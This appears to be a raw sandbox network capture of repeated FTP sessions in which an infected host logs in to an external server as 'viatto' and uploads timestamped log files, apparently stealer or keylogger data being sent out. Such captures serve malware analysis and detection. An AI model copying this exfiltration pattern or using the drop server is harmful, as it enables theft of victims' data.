                                                                                                                                    Oct 10, 2022 06:03:33.217727900 CEST2149991185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:33.219876051 CEST4999121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:33.246174097 CEST2149991185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,173)
                                                                                                                                    Oct 10, 2022 06:03:33.274210930 CEST4999121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.26.txt
                                                                                                                                    Oct 10, 2022 06:03:33.298706055 CEST2149991185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:33.325575113 CEST2149991185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:33.531658888 CEST2149993185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:33.531697989 CEST2149993185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:33.532268047 CEST2149993185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:33.532424927 CEST4999321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:33.555953979 CEST2149993185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:33.556540966 CEST4999321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:33.580229998 CEST2149993185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:33.580754042 CEST4999321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:33.604301929 CEST2149993185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:33.604868889 CEST4999321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:33.629040003 CEST2149993185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:33.630465031 CEST4999321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:33.653836012 CEST2149993185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:33.655333996 CEST4999321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:33.679876089 CEST2149993185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,174)
                                                                                                                                    Oct 10, 2022 06:03:33.705694914 CEST4999321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.27.txt
                                                                                                                                    Oct 10, 2022 06:03:33.731203079 CEST2149993185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:33.756108999 CEST2149993185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:33.950196028 CEST2149995185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:33.950221062 CEST2149995185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:33.950237036 CEST2149995185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:33.950651884 CEST4999521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:33.973601103 CEST2149995185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:33.973865986 CEST4999521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:33.997592926 CEST2149995185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:33.998230934 CEST4999521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:34.021225929 CEST2149995185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:34.021663904 CEST4999521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:34.045378923 CEST2149995185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:34.046174049 CEST4999521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:34.069209099 CEST2149995185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:34.070327997 CEST4999521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:34.093643904 CEST2149995185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,175)
                                                                                                                                    Oct 10, 2022 06:03:34.119827986 CEST4999521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.28.txt
                                                                                                                                    Oct 10, 2022 06:03:34.144422054 CEST2149995185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:34.171339035 CEST2149995185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:34.372826099 CEST2149997185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:34.372867107 CEST2149997185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:34.372875929 CEST2149997185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:34.373610973 CEST4999721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:34.396203995 CEST2149997185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:34.396617889 CEST4999721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:34.419356108 CEST2149997185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:34.419732094 CEST4999721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:34.442609072 CEST2149997185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:34.443063021 CEST4999721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:34.466301918 CEST2149997185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:34.466993093 CEST4999721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:34.489581108 CEST2149997185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:34.490928888 CEST4999721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:34.513787985 CEST2149997185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,176)
                                                                                                                                    Oct 10, 2022 06:03:34.539164066 CEST4999721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.29.txt
                                                                                                                                    Oct 10, 2022 06:03:34.562210083 CEST2149997185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:34.588460922 CEST2149997185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:34.814107895 CEST2149999185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:34.814269066 CEST2149999185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:34.814285994 CEST2149999185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:34.824784040 CEST4999921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:34.847609997 CEST2149999185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:34.847882032 CEST4999921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:34.870589018 CEST2149999185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:34.870879889 CEST4999921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:34.893444061 CEST2149999185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:34.893708944 CEST4999921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:34.916721106 CEST2149999185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:34.917247057 CEST4999921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:34.939822912 CEST2149999185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:34.945470095 CEST4999921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:34.968534946 CEST2149999185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,178)
                                                                                                                                    Oct 10, 2022 06:03:34.996030092 CEST4999921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.30.txt
                                                                                                                                    Oct 10, 2022 06:03:35.019474030 CEST2149999185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:35.043653011 CEST2149999185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:35.252365112 CEST2150001185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:35.252599955 CEST2150001185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:35.252634048 CEST2150001185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:35.253319979 CEST5000121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:35.278217077 CEST2150001185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:35.278472900 CEST5000121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:35.302769899 CEST2150001185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:35.303178072 CEST5000121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:35.327775955 CEST2150001185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:35.330724955 CEST5000121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:35.356210947 CEST2150001185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:35.356729031 CEST5000121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:35.386100054 CEST2150001185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:35.387217045 CEST5000121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:35.413714886 CEST2150001185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,179)
                                                                                                                                    Oct 10, 2022 06:03:35.439868927 CEST5000121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.31.txt
                                                                                                                                    Oct 10, 2022 06:03:35.466365099 CEST2150001185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:35.501327038 CEST2150001185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:35.706521988 CEST2150003185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:35.706572056 CEST2150003185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:35.706696987 CEST2150003185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:35.707027912 CEST5000321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:35.730174065 CEST2150003185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:35.733192921 CEST5000321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:35.756047964 CEST2150003185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:35.756477118 CEST5000321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:35.779390097 CEST2150003185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:35.780123949 CEST5000321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:35.804986954 CEST2150003185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:35.806199074 CEST5000321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:35.830843925 CEST2150003185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:35.832824945 CEST5000321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:35.856430054 CEST2150003185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,180)
                                                                                                                                    Oct 10, 2022 06:03:35.884211063 CEST5000321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.32.txt
                                                                                                                                    Oct 10, 2022 06:03:35.909949064 CEST2150003185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:35.936311007 CEST2150003185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:36.134748936 CEST2150005185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:36.135070086 CEST2150005185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:36.135515928 CEST2150005185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:36.137667894 CEST5000521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:36.163786888 CEST2150005185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:36.164123058 CEST5000521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:36.196285009 CEST2150005185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:36.196856022 CEST5000521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:36.221832037 CEST2150005185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:36.226274014 CEST5000521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:36.250345945 CEST2150005185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:36.254725933 CEST5000521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:36.278608084 CEST2150005185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:36.285825968 CEST5000521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:36.311192989 CEST2150005185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,181)
                                                                                                                                    Oct 10, 2022 06:03:36.335861921 CEST5000521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.33.txt
                                                                                                                                    Oct 10, 2022 06:03:36.360923052 CEST2150005185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:36.389962912 CEST2150005185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:36.580832005 CEST2150007185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:36.580892086 CEST2150007185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:36.580924034 CEST2150007185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:36.581703901 CEST5000721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:36.605561972 CEST2150007185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:36.605870962 CEST5000721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:36.631757021 CEST2150007185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:36.632256031 CEST5000721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:36.656601906 CEST2150007185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:36.658196926 CEST5000721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:36.682019949 CEST2150007185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:36.682671070 CEST5000721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:36.708250999 CEST2150007185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:36.709374905 CEST5000721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:36.735239029 CEST2150007185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,182)
                                                                                                                                    Oct 10, 2022 06:03:36.759833097 CEST5000721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.34.txt
                                                                                                                                    Oct 10, 2022 06:03:36.783962011 CEST2150007185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:36.808301926 CEST2150007185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:36.993753910 CEST2150009185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:36.993809938 CEST2150009185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:36.994029045 CEST2150009185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:36.994575977 CEST5000921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:37.017102003 CEST2150009185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:37.018151045 CEST5000921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:37.040715933 CEST2150009185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:37.040962934 CEST5000921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:37.063452959 CEST2150009185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:37.063843012 CEST5000921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:37.086844921 CEST2150009185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:37.087872028 CEST5000921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:37.110354900 CEST2150009185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:37.112715960 CEST5000921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:37.135778904 CEST2150009185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,183)
                                                                                                                                    Oct 10, 2022 06:03:37.160228014 CEST5000921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.35.txt
                                                                                                                                    Oct 10, 2022 06:03:37.183933020 CEST2150009185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:37.207838058 CEST2150009185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:37.391433001 CEST2150011185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:37.391489983 CEST2150011185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:37.391509056 CEST2150011185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:37.391855955 CEST5001121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:37.417826891 CEST2150011185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:37.418301105 CEST5001121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:37.446916103 CEST2150011185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:37.447303057 CEST5001121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:37.473675013 CEST2150011185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:37.473980904 CEST5001121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:37.499680042 CEST2150011185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:37.500195980 CEST5001121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:37.526230097 CEST2150011185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:37.532912016 CEST5001121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:37.558954000 CEST2150011185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,184)
                                                                                                                                    Oct 10, 2022 06:03:37.597937107 CEST5001121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.36.txt
                                                                                                                                    Oct 10, 2022 06:03:37.623512030 CEST2150011185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:37.652667046 CEST2150011185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:37.855978012 CEST2150013185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:37.855997086 CEST2150013185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:37.856367111 CEST2150013185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:37.856509924 CEST5001321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:37.879554033 CEST2150013185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:37.879852057 CEST5001321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:37.903146029 CEST2150013185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:37.903409004 CEST5001321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:37.926327944 CEST2150013185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:37.926584959 CEST5001321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:37.949755907 CEST2150013185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:37.950262070 CEST5001321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:37.973134995 CEST2150013185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:37.977044106 CEST5001321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:38.000317097 CEST2150013185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,186)
                                                                                                                                    Oct 10, 2022 06:03:38.030196905 CEST5001321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.37.txt
                                                                                                                                    Oct 10, 2022 06:03:38.054743052 CEST2150013185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:38.081404924 CEST2150013185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:38.291862011 CEST2150015185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:38.297105074 CEST2150015185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:38.297288895 CEST2150015185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:38.300586939 CEST5001521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:38.327039003 CEST2150015185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:38.327855110 CEST5001521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:38.354835987 CEST2150015185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:38.355106115 CEST5001521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:38.379923105 CEST2150015185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:38.380171061 CEST5001521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:38.405917883 CEST2150015185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:38.407299995 CEST5001521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:38.432708025 CEST2150015185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:38.435282946 CEST5001521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:38.461587906 CEST2150015185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,187)
                                                                                                                                    Oct 10, 2022 06:03:38.488158941 CEST5001521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.38.txt
                                                                                                                                    Oct 10, 2022 06:03:38.513097048 CEST2150015185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:38.540149927 CEST2150015185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:38.759934902 CEST2150017185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:38.759963036 CEST2150017185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:38.759982109 CEST2150017185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:38.760361910 CEST5001721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:38.783324003 CEST2150017185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:38.786076069 CEST5001721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:38.809201956 CEST2150017185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:38.813201904 CEST5001721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:38.835706949 CEST2150017185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:38.838181973 CEST5001721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:38.861136913 CEST2150017185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:38.862392902 CEST5001721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:38.885068893 CEST2150017185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:38.895800114 CEST5001721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:38.918776989 CEST2150017185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,188)
                                                                                                                                    Oct 10, 2022 06:03:38.944662094 CEST5001721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.39.txt
                                                                                                                                    Oct 10, 2022 06:03:38.971126080 CEST2150017185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:38.999978065 CEST2150017185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:39.188776016 CEST2150019185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:39.188862085 CEST2150019185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:39.188899994 CEST2150019185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
